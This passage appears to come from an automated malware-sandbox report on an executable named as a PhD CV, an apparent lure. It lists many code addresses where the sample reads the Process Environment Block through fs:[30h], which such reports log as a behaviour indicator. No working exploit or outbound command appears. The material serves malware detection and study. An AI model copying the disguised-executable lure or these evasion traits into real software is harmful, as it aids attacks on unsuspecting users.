                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6E507 mov eax, dword ptr fs:[00000030h]2_2_00F6E507
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6E507 mov eax, dword ptr fs:[00000030h]2_2_00F6E507
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F42500 mov eax, dword ptr fs:[00000030h]2_2_00F42500
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7C50D mov eax, dword ptr fs:[00000030h]2_2_00F7C50D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7C50D mov eax, dword ptr fs:[00000030h]2_2_00F7C50D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBC6F2 mov eax, dword ptr fs:[00000030h]2_2_00FBC6F2
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBC6F2 mov eax, dword ptr fs:[00000030h]2_2_00FBC6F2
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4C6E0 mov eax, dword ptr fs:[00000030h]2_2_00F4C6E0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F666E0 mov eax, dword ptr fs:[00000030h]2_2_00F666E0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F666E0 mov eax, dword ptr fs:[00000030h]2_2_00F666E0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FD66D0 mov eax, dword ptr fs:[00000030h]2_2_00FD66D0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FD66D0 mov eax, dword ptr fs:[00000030h]2_2_00FD66D0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FEE6D0 mov eax, dword ptr fs:[00000030h]2_2_00FEE6D0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F406CF mov eax, dword ptr fs:[00000030h]2_2_00F406CF
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FE86C2 mov eax, dword ptr fs:[00000030h]2_2_00FE86C2
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F48690 mov eax, dword ptr fs:[00000030h]2_2_00F48690
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FCC691 mov eax, dword ptr fs:[00000030h]2_2_00FCC691
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F50680 mov eax, dword ptr fs:[00000030h]2_2_00F50680
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F50680 mov eax, dword ptr fs:[00000030h]2_2_00F50680
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F50680 mov eax, dword ptr fs:[00000030h]2_2_00F50680
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F50680 mov eax, dword ptr fs:[00000030h]2_2_00F50680
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F50680 mov eax, dword ptr fs:[00000030h]2_2_00F50680
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F50680 mov eax, dword ptr fs:[00000030h]2_2_00F50680
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F50680 mov eax, dword ptr fs:[00000030h]2_2_00F50680
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F50680 mov eax, dword ptr fs:[00000030h]2_2_00F50680
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F50680 mov eax, dword ptr fs:[00000030h]2_2_00F50680
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F50680 mov eax, dword ptr fs:[00000030h]2_2_00F50680
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F50680 mov eax, dword ptr fs:[00000030h]2_2_00F50680
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F50680 mov eax, dword ptr fs:[00000030h]2_2_00F50680
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F40670 mov eax, dword ptr fs:[00000030h]2_2_00F40670
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82670 mov eax, dword ptr fs:[00000030h]2_2_00F82670
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82670 mov eax, dword ptr fs:[00000030h]2_2_00F82670
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7666D mov esi, dword ptr fs:[00000030h]2_2_00F7666D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7666D mov eax, dword ptr fs:[00000030h]2_2_00F7666D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7666D mov eax, dword ptr fs:[00000030h]2_2_00F7666D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FCE660 mov eax, dword ptr fs:[00000030h]2_2_00FCE660
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7265C mov eax, dword ptr fs:[00000030h]2_2_00F7265C
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7265C mov ecx, dword ptr fs:[00000030h]2_2_00F7265C
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7265C mov eax, dword ptr fs:[00000030h]2_2_00F7265C
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7C640 mov eax, dword ptr fs:[00000030h]2_2_00F7C640
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7C640 mov eax, dword ptr fs:[00000030h]2_2_00F7C640
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F40630 mov eax, dword ptr fs:[00000030h]2_2_00F40630
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F70630 mov eax, dword ptr fs:[00000030h]2_2_00F70630
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC8633 mov esi, dword ptr fs:[00000030h]2_2_00FC8633
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC8633 mov eax, dword ptr fs:[00000030h]2_2_00FC8633
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC8633 mov eax, dword ptr fs:[00000030h]2_2_00FC8633
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7C620 mov eax, dword ptr fs:[00000030h]2_2_00F7C620
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_01014600 mov eax, dword ptr fs:[00000030h]2_2_01014600
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6E7E0 mov eax, dword ptr fs:[00000030h]2_2_00F6E7E0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FE47B4 mov eax, dword ptr fs:[00000030h]2_2_00FE47B4
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FE47B4 mov eax, dword ptr fs:[00000030h]2_2_00FE47B4
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FE47B4 mov eax, dword ptr fs:[00000030h]2_2_00FE47B4
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FE47B4 mov eax, dword ptr fs:[00000030h]2_2_00FE47B4
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FE47B4 mov eax, dword ptr fs:[00000030h]2_2_00FE47B4
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FE47B4 mov eax, dword ptr fs:[00000030h]2_2_00FE47B4
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FE47B4 mov ecx, dword ptr fs:[00000030h]2_2_00FE47B4
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FDC7B0 mov eax, dword ptr fs:[00000030h]2_2_00FDC7B0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FDC7B0 mov eax, dword ptr fs:[00000030h]2_2_00FDC7B0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F407A7 mov eax, dword ptr fs:[00000030h]2_2_00F407A7
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBE79D mov eax, dword ptr fs:[00000030h]2_2_00FBE79D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBE79D mov eax, dword ptr fs:[00000030h]2_2_00FBE79D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBE79D mov eax, dword ptr fs:[00000030h]2_2_00FBE79D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBE79D mov eax, dword ptr fs:[00000030h]2_2_00FBE79D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBE79D mov eax, dword ptr fs:[00000030h]2_2_00FBE79D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBE79D mov eax, dword ptr fs:[00000030h]2_2_00FBE79D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBE79D mov eax, dword ptr fs:[00000030h]2_2_00FBE79D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBE79D mov eax, dword ptr fs:[00000030h]2_2_00FBE79D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBE79D mov eax, dword ptr fs:[00000030h]2_2_00FBE79D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F70774 mov eax, dword ptr fs:[00000030h]2_2_00F70774
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F44779 mov eax, dword ptr fs:[00000030h]2_2_00F44779
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F44779 mov eax, dword ptr fs:[00000030h]2_2_00F44779
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F52760 mov ecx, dword ptr fs:[00000030h]2_2_00F52760
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F62755 mov eax, dword ptr fs:[00000030h]2_2_00F62755
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F62755 mov eax, dword ptr fs:[00000030h]2_2_00F62755
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F62755 mov eax, dword ptr fs:[00000030h]2_2_00F62755
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F62755 mov ecx, dword ptr fs:[00000030h]2_2_00F62755
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F62755 mov eax, dword ptr fs:[00000030h]2_2_00F62755
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F62755 mov eax, dword ptr fs:[00000030h]2_2_00F62755
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7A750 mov eax, dword ptr fs:[00000030h]2_2_00F7A750
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_010086A8 mov eax, dword ptr fs:[00000030h]2_2_010086A8
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_010086A8 mov eax, dword ptr fs:[00000030h]2_2_010086A8
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FEE750 mov eax, dword ptr fs:[00000030h]2_2_00FEE750
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_0100A6C0 mov eax, dword ptr fs:[00000030h]2_2_0100A6C0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4471B mov eax, dword ptr fs:[00000030h]2_2_00F4471B
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4471B mov eax, dword ptr fs:[00000030h]2_2_00F4471B
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6270D mov eax, dword ptr fs:[00000030h]2_2_00F6270D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6270D mov eax, dword ptr fs:[00000030h]2_2_00F6270D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6270D mov eax, dword ptr fs:[00000030h]2_2_00F6270D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4A8F0 mov eax, dword ptr fs:[00000030h]2_2_00F4A8F0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4A8F0 mov eax, dword ptr fs:[00000030h]2_2_00F4A8F0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4A8F0 mov eax, dword ptr fs:[00000030h]2_2_00F4A8F0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4A8F0 mov eax, dword ptr fs:[00000030h]2_2_00F4A8F0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4A8F0 mov eax, dword ptr fs:[00000030h]2_2_00F4A8F0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4A8F0 mov eax, dword ptr fs:[00000030h]2_2_00F4A8F0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FD88FB mov eax, dword ptr fs:[00000030h]2_2_00FD88FB
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F748F0 mov eax, dword ptr fs:[00000030h]2_2_00F748F0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_0101492D mov eax, dword ptr fs:[00000030h]2_2_0101492D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_0100892E mov eax, dword ptr fs:[00000030h]2_2_0100892E
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_0100892E mov eax, dword ptr fs:[00000030h]2_2_0100892E
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F408CD mov eax, dword ptr fs:[00000030h]2_2_00F408CD
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F408CD mov eax, dword ptr fs:[00000030h]2_2_00F408CD
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F388C8 mov eax, dword ptr fs:[00000030h]2_2_00F388C8
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F388C8 mov eax, dword ptr fs:[00000030h]2_2_00F388C8
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FF8890 mov eax, dword ptr fs:[00000030h]2_2_00FF8890
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FF8890 mov eax, dword ptr fs:[00000030h]2_2_00FF8890
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC488F mov eax, dword ptr fs:[00000030h]2_2_00FC488F
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F66882 mov eax, dword ptr fs:[00000030h]2_2_00F66882
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F66882 mov eax, dword ptr fs:[00000030h]2_2_00F66882
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F66882 mov eax, dword ptr fs:[00000030h]2_2_00F66882
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F8088E mov eax, dword ptr fs:[00000030h]2_2_00F8088E
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F8088E mov edx, dword ptr fs:[00000030h]2_2_00F8088E
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F8088E mov eax, dword ptr fs:[00000030h]2_2_00F8088E
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FCC870 mov eax, dword ptr fs:[00000030h]2_2_00FCC870
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FF0835 mov eax, dword ptr fs:[00000030h]2_2_00FF0835
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FF0835 mov eax, dword ptr fs:[00000030h]2_2_00FF0835
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FF0835 mov eax, dword ptr fs:[00000030h]2_2_00FF0835
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FF0835 mov eax, dword ptr fs:[00000030h]2_2_00FF0835
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FF0835 mov eax, dword ptr fs:[00000030h]2_2_00FF0835
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FF0835 mov eax, dword ptr fs:[00000030h]2_2_00FF0835
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FF0835 mov eax, dword ptr fs:[00000030h]2_2_00FF0835
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FF0835 mov eax, dword ptr fs:[00000030h]2_2_00FF0835
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FF0835 mov eax, dword ptr fs:[00000030h]2_2_00FF0835
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FF0835 mov eax, dword ptr fs:[00000030h]2_2_00FF0835
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FF0835 mov eax, dword ptr fs:[00000030h]2_2_00FF0835
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FF0835 mov eax, dword ptr fs:[00000030h]2_2_00FF0835
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FF0835 mov eax, dword ptr fs:[00000030h]2_2_00FF0835
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_010129CF mov eax, dword ptr fs:[00000030h]2_2_010129CF
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_010129CF mov eax, dword ptr fs:[00000030h]2_2_010129CF
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7C819 mov eax, dword ptr fs:[00000030h]2_2_00F7C819
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7C819 mov eax, dword ptr fs:[00000030h]2_2_00F7C819
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F409F0 mov eax, dword ptr fs:[00000030h]2_2_00F409F0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F749F0 mov eax, dword ptr fs:[00000030h]2_2_00F749F0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F749F0 mov eax, dword ptr fs:[00000030h]2_2_00F749F0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F489C0 mov eax, dword ptr fs:[00000030h]2_2_00F489C0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F489C0 mov eax, dword ptr fs:[00000030h]2_2_00F489C0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F789B0 mov edx, dword ptr fs:[00000030h]2_2_00F789B0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FD69B0 mov eax, dword ptr fs:[00000030h]2_2_00FD69B0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FD69B0 mov eax, dword ptr fs:[00000030h]2_2_00FD69B0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FD69B0 mov ecx, dword ptr fs:[00000030h]2_2_00FD69B0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4E9A0 mov eax, dword ptr fs:[00000030h]2_2_00F4E9A0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4E9A0 mov eax, dword ptr fs:[00000030h]2_2_00F4E9A0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4E9A0 mov eax, dword ptr fs:[00000030h]2_2_00F4E9A0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4E9A0 mov eax, dword ptr fs:[00000030h]2_2_00F4E9A0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4E9A0 mov eax, dword ptr fs:[00000030h]2_2_00F4E9A0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4E9A0 mov eax, dword ptr fs:[00000030h]2_2_00F4E9A0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4E9A0 mov eax, dword ptr fs:[00000030h]2_2_00F4E9A0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4E9A0 mov eax, dword ptr fs:[00000030h]2_2_00F4E9A0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4E9A0 mov eax, dword ptr fs:[00000030h]2_2_00F4E9A0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC89A0 mov eax, dword ptr fs:[00000030h]2_2_00FC89A0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7C98F mov eax, dword ptr fs:[00000030h]2_2_00F7C98F
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7C98F mov eax, dword ptr fs:[00000030h]2_2_00F7C98F
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7C98F mov eax, dword ptr fs:[00000030h]2_2_00F7C98F
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FE0980 mov eax, dword ptr fs:[00000030h]2_2_00FE0980
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FE0980 mov eax, dword ptr fs:[00000030h]2_2_00FE0980
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F46970 mov eax, dword ptr fs:[00000030h]2_2_00F46970
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F46970 mov eax, dword ptr fs:[00000030h]2_2_00F46970
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F46970 mov eax, dword ptr fs:[00000030h]2_2_00F46970
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F46970 mov eax, dword ptr fs:[00000030h]2_2_00F46970
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F46970 mov eax, dword ptr fs:[00000030h]2_2_00F46970
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F46970 mov eax, dword ptr fs:[00000030h]2_2_00F46970
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F46970 mov eax, dword ptr fs:[00000030h]2_2_00F46970
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F5096B mov eax, dword ptr fs:[00000030h]2_2_00F5096B
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F5096B mov eax, dword ptr fs:[00000030h]2_2_00F5096B
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F64955 mov eax, dword ptr fs:[00000030h]2_2_00F64955
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F64955 mov eax, dword ptr fs:[00000030h]2_2_00F64955
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7C958 mov eax, dword ptr fs:[00000030h]2_2_00F7C958
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7C944 mov eax, dword ptr fs:[00000030h]2_2_00F7C944
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6E94E mov eax, dword ptr fs:[00000030h]2_2_00F6E94E
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F9693A mov eax, dword ptr fs:[00000030h]2_2_00F9693A
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F9693A mov eax, dword ptr fs:[00000030h]2_2_00F9693A
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F9693A mov eax, dword ptr fs:[00000030h]2_2_00F9693A
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBC920 mov ecx, dword ptr fs:[00000030h]2_2_00FBC920
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBC920 mov eax, dword ptr fs:[00000030h]2_2_00FBC920
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBC920 mov eax, dword ptr fs:[00000030h]2_2_00FBC920
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBC920 mov eax, dword ptr fs:[00000030h]2_2_00FBC920
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F96912 mov eax, dword ptr fs:[00000030h]2_2_00F96912
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F72919 mov eax, dword ptr fs:[00000030h]2_2_00F72919
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F72919 mov eax, dword ptr fs:[00000030h]2_2_00F72919
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC0AFF mov eax, dword ptr fs:[00000030h]2_2_00FC0AFF
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC0AFF mov eax, dword ptr fs:[00000030h]2_2_00FC0AFF
